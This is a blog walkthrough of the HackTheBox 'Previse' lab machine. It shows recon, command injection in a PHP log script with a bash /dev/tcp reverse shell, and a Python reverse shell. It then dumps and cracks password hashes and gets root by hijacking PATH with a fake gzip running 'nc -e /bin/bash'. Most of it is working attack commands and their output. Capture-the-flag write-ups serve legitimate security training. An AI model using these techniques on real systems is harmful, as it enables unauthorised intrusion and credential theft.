Lance Grover

Lance Grover

HTB – Previse – Walkthrough

Posted date:


Quick notes for Previse HTB machine

nmap -sV -sC 10.10.11.104

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 22:15 MST
Nmap scan report for 10.10.11.104
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds


echo "10.10.11.104 previse.htb" >> /etc/hosts


ffuf -u http://previse.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://previse.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php               [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php            [Status: 302, Size: 0, Words: 1, Lines: 1]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
footer.php              [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php              [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico             [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.                       [Status: 302, Size: 2801, Words: 737, Lines: 72]
.html                   [Status: 403, Size: 276, Words: 20, Lines: 10]
.php                    [Status: 403, Size: 276, Words: 20, Lines: 10]
status.php              [Status: 302, Size: 2968, Words: 749, Lines: 75]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htm                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswds              [Status: 403, Size: 276, Words: 20, Lines: 10]
nav.php                 [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php            [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php               [Status: 302, Size: 4914, Words: 1531, Lines: 113]
.htgroup                [Status: 403, Size: 276, Words: 20, Lines: 10]
wp-forum.phps           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.bak           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htuser                 [Status: 403, Size: 276, Words: 20, Lines: 10]
.ht                     [Status: 403, Size: 276, Words: 20, Lines: 10]
.htc                    [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.old           [Status: 403, Size: 276, Words: 20, Lines: 10]
.htacess                [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [37050/37050] :: Job [1/1] :: 449 req/sec :: Duration: [0:01:20] :: Errors: 1 ::





curl -v -d "username=lanix13&password=mypass&confirm=mypass" http://previse.htb/accounts.php

was able to login and go to the Files tab, there is a siteBackup.zip available for download

mkdir siteBackup
cd siteBackup/
unzip ../siteBackup
Archive:  ../siteBackup.zip
  inflating: accounts.php            
  inflating: config.php              
  inflating: download.php            
  inflating: file_logs.php           
  inflating: files.php               
  inflating: footer.php              
  inflating: header.php              
  inflating: index.php               
  inflating: login.php               
  inflating: logout.php              
  inflating: logs.php                
  inflating: nav.php                 
  inflating: status.php

in the file_logs.php there is something fun

logs.php:$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");

curl -v -d "username=lanix133&password=mypass" http://previse.htb/login.php

nc -lnvp 1234

curl -v -b "PHPSESSID=2qvup9fgetiqljd36jieg3gbhl" -d "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/1234+0>%261'" http://previse.htb/logs.php

I have a basic shell, I wanted to upgrade, usually I can with this but it didn’t work in this case

python -c 'import pty:pty.spawn("/bin/bash")'

So I went ahead and just spawned a new reverse shell using python

nc -lvnp 6666
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

now in this new shell I could run mysql a little better

c -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 51970
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ screen -list
screen -list
No Sockets found in /run/screen/S-www-data.

www-data@previse:/var/www/html$ mysql -u root -p < "show databases"    
mysql -u root -p < "show databases"
bash: show databases: No such file or directory
www-data@previse:/var/www/html$ mysql -u root -p -e "show databases"
mysql -u root -p -e "show databases"
Enter password: mySQL_p@ssw0rd!:)
Database
information_schema
mysql
performance_schema
previse
sys
www-data@previse:/var/www/html$ mysql -u root -p previse -e "show tables;"
mysql -u root -p previse -e "show tables;"
Enter password: mySQL_p@ssw0rd!:)
Tables_in_previse
accounts
files
www-data@previse:/var/www/html$ mysql -u root -p previse -e "select * from accounts;"
<sql -u root -p previse -e "select * from accounts;"
Enter password: mySQL_p@ssw0rd!:)
id	username	password	created_at
1	m4lwhere	$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.	2021-05-27 18:18:36
2	loda123	$1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1	2022-01-07 05:13:23
3	vector	$1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1	2022-01-07 05:13:24
4	lanix13	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:29:49
5	bigbose	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:32:21
6	adrian	$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//	2022-01-07 05:48:10
7	lanix133	$1$🧂llol$eTC00smlkY12Xcfpgowpq1	2022-01-07 05:59:04
www-data@previse:/var/www/html$

took the hash for m4lwhere and used hashcat to crack it:

hashcat -m 500 previse.hash /usr/share/wordlists/rockyou.txt

$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!

I took that password and m4lwhere and attempted ssh, it worked!

$ ssh m4lwhere@previse.htb
The authenticity of host 'previse.htb (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
m4lwhere@previse.htb's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jan  7 06:22:56 UTC 2022

  System load:  0.07              Processes:           184
  Usage of /:   50.5% of 4.85GB   Users logged in:     0
  Memory usage: 25%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.


Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt 
ae1**************************


m4lwhere@previse:~$ sudo -l
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh

m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh 
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz


cd /var/shm
echo "nc 10.10.14.10 5555 -e /bin/bash" > gzip

nc -lvnp 5555

export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh

listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 59622
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt	
cat root.txt
6e2c7***************

and final proof:

cat /etc/shadow
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::